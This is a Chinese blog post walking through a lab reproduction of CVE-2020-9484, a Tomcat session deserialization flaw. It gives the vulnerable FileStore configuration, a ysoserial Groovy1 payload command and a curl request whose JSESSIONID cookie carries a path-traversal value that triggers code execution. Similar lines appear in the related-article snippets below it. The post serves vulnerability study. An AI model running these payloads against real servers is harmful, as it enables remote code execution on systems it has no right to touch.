Tomcat Session 反序列化(CVE-2020-9484)

最新推荐文章于 2024-04-12 09:50:46 发布
最新推荐文章于 2024-04-12 09:50:46 发布
阅读量952 收藏 2
点赞数
分类专栏: 中间件漏洞复现 文章标签: tomcat 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/109958306
版权

声明

好好学习,天天向上

漏洞描述

Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。

由于错误配置和 org.apache.catalina.session.FileStore 的 LFI 和反序列化漏洞引起的 RCE。

当配置了 org.apache.catalina.session.PersistentManager 并且使用 org.apache.catalina.session.FileStore 来储存 session 时, 用户可以通过 org.apache.catalina.session.FileStore 的一个 LFI 漏洞来读取服务器上任意以 .session结尾的文件。然后通过反序列化来运行 .session 文件。

默认情况是使用 org.apache.catalina.session.StandardManager, 将 session储存到内存,而 PersistentManager 会将不常用的 session swap out, 从而减少内存占用。

影响范围

10.0.0-M1 to 10.0.0-M4

9.0.0.M1 to 9.0.34

8.5.0 to 8.5.54

7.0.0 to 7.0.103

复现过程

这里使用10.0.0-M4

我把tomcat搭建在我的kali上,所以我还是自己攻自己,源和目标IP都为192.168.239.139

这里要用到tomcat,groovy和反序列化利用工具ysoserial

tomcat搭建

访问

https://repo1.maven.org/maven2/org/apache/tomcat/tomcat/10.0.0-M4/

我下载的是tar.gz

然后放到kali中,解压缩

在这里插入图片描述

修改tomcat/conf/context.xlm, 添加 Manager,里面加入

<Manager className="org.apache.catalina.session.PersistentManager">
    <Store className="org.apache.catalina.session.FileStore" directory="/tomcat/sessions/"/>
</Manager>

加入后的contest.xlm为

在这里插入图片描述

下载 groovy-2.3.9.jar

https://mvnrepository.com/artifact/org.codehaus.groovy/groovy/2.3.9

还要选择,我是个大活人,验证码验证才能下载,我这里下载jar包

在这里插入图片描述

放到tomcat的lib中

在这里插入图片描述

进入到tomcat的bin目录下执行启动命令来启动tomcat

./catalina.sh start

在这里插入图片描述

使用ysoserial工具攻击,需要提前下载好ysoserial的jar包,下载地址

https://jitpack.io/com/github/frohoff/ysoserial/master-30099844c6-1/ysoserial-master-30099844c6-1.jar

下载好后,执行

java -jar ysoserial-master-30099844c6-1.jar Groovy1 "touch /tmp/cve-2020-9484" > /tmp/test.session

再执行,因为我tomcat搭建在kali上,这里就填自己的IP了

curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../tmp/test'

查看touch命令是否执行成功

ls /tmp

在这里插入图片描述

维梓-
关注
专栏目录
Tomcat Session(CVE-2020-9484)反序列化
m0_48520508的博客
08-01 1120
0x01简介 Apache Tomcat最早是由Sun Microsystems开发的一个Servlet容器,在1999年被捐献给ASF(Apache Software Foundation),隶属于Jakarta项目,现在已经独立为一个顶级项目。Tomcat主要实现了Java EE中的Servlet、JSP规范,同时也提供HTTP服务,是市场上非常流行的Java Web容器。 Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被
CVE-2020-9484 Tomcat Session 反序列化复现
weixin_45260839的博客
07-01 1776
CVE-2020-9484 Tomcat Session 反序列化复现
Tomcat Session(CVE-2020-9484)反序列化漏洞复现
热门推荐
qq_40898302的博客
04-20 1万+
一、漏洞介绍 北京时间2020年05月20日,Apache官方发布了 Apache Tomcat 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-9484。 Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功...
CVE-2020-9484 (Tomcat cluster sync-session)复现
thelostworld
08-20 1379
CVE-2020-9484 一、漏洞简介 对于一个企业级应用而言,Session对象的管理十分重要。Sessio对象的信息一般情况下置于服务器的内存中,当服务器由于故障重启,或应用重新加载 时候,此时的Session信息将全部丢失。为了避免这样的情况,在某些场合可以将服务器的Session数据存放在文件系统或数据库中,这样的操作称为 Session对象的持久化。Session对象在持久化时,存放在其中的对象以序列化的形式存放,这就是为什么一般存放在Session中的数据需要实 现可序...
CVE-2020-9484: Apache Tomcat Session 反序列化代码执行漏洞
最新发布
weixin_56306210的博客
04-12 1104
CVE-2020-9484: Apache Tomcat Session 反序列化代码执行漏洞
[Timeline Sec] - CVE-2020-9484Tomcat Session 反序列化复现1
08-03
CVE-2020-9484的根源在于错误配置和`org.apache.catalina.session.FileStore`组件中的本地文件包含(LFI)以及反序列化问题。当Tomcat配置使用`org.apache.catalina.session.PersistentManager`作为会话管理器,并且...
银河麒麟服务器操作系统Tomcat Session 反序列化代码执行漏洞(CVE-2020-9484)修复补丁
03-14
亲测有效,可能还需要其他环境,可在我个人发布里看
CVE-2020-9484
04-13
CVE-2020-9484Tomcat) 仅用于教育目的。 有关详细信息,请参见参考。 跑步 $ git clone https://github.com/masahiro331/CVE-2020-9484.git $ cd CVE-2020-9484 $ docker build -t tomcat:groovy . $ docker run -d -p 8080:8080 tomcat:groovy 开发 $ curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' 查看 $ docker exec -it $CONTAINER /bin/sh $ ls /tmp/rce
tomcat-session序列化(tomcat-kryo序列化)
06-21
tomcat kryo序列化,msm-memcached-session-manager-tc7-1.8.2
CVE-2020-9484 tomcat session反序列化漏洞分析与复现
Jietewang的博客
06-01 4721
CVE-2020-9484 tomcat session反序列化漏洞分析与复现 一、初识tomcat session持久化 1.简介 对于一个企业级应用而言,Session对象的管理十分重要。Sessio对象的信息一般情况下置于服务器的内存中,当服务器由于故障重启,或应用重新加载 时候,此时的Session信息将全部丢失。为了避免这样的情况,在某些场合可以将服务器的Session数据存放在文件系统或数据库中,这样的操作称为 Session对象的持久化。S...
Tomcat-Session反序列化学习
feng的博客
03-02 1476
Tomcat-Session反序列化学习 简介 CVE-2020-9484。 要求: tomcat必须启用session持久化功能FileStore tomcat/lib或者WEB-INF/lib目录下的依赖存在可用的gadget 在服务器上存在已知路径文件内容可控 漏洞分析 漏洞比较简单就直接提一下,具体的代码可以自己分析。 当开启了session持久化功能FileStore的时候: <?xml version="1.0" encoding="UTF-8"?> <!-
Apache #Tomcat CVE-2020-9484
qq_36584013的博客
06-22 909
CVE-2020-9484 用Kali 2.0复现Apache Tomcat Session反序列化代码执行漏洞 CVE-2020-9484 环境: Kali 2.0 apache-tomcat-7.0.61-CVE-2020-9484.tar.gz(webapp是s2-053,在其lib下加了commons-collections4-4.0.jar) 启动 /yourtomcat...
CVE-2020-9484 Apache Tomcat Remote Code Execution via session persistence
lefooter的博客
05-21 1652
版权声明:本文为CSDN博主「隐形人真忙」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/u011721501/article/details/88637270 近楼主也没有其他的时间来做漏洞研究了,读者们可以从本博上次更新的时间就可以看出来=_,=。 但是为了一直关注本楼主的朋友们,我决定拿出两年前的一个存货(其实是辣鸡洞)分享,诚意满满(大雾)。 以下是正文: ————————————————————.
tomcat session漏洞反序列化详解
weixin_43104804的博客
06-02 679
1. 条件 1)攻击者可以控制服务器上的文件名/文件内容 2)tomcat context配置了persistencemanager的fileSotre 3) persistenceManager 配置了sessionAttributeValueClassNameFilter的值为NULL或者宽松过滤 4) 攻击者知道fileSotre存放位置 条件非常苛刻, 需要同时满足该4个条件。 2. 漏洞原理 利用tomcat创建的session,反序列后进行恶性攻击。 一般而言,session存在于服务器内存中
tomcat源码分析_CVE-2020-9484 tomcat session反序列化漏洞分析
weixin_39839162的博客
11-27 237
作者:N1gh5合天智汇title: CVE-2020-9484 tomcat session反序列化漏洞分析 tags: CVE,Tomcat,反序列化 grammar_cjkRuby: true本文借助CVE-2020-9484 Tomcat漏洞详细的介绍了本地和远程调试Tomcat 源码。分析漏洞成因以及补丁修补情况,以及分析ysoserial反序列化链。0x01 漏洞简介Apache To...
CVE-2020-9484Tomcat Session 反序列化漏洞复现分析
"CVE-2020-9484是一个关于Apache Tomcat Web服务器的漏洞,主要涉及Session反序列化和本地文件包含(LFI)问题,可能导致远程代码执行(RCE)。此漏洞影响多个Tomcat版本,包括10.0.0-M1至10.0.0-M4,9.0.0.M1至9.0....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值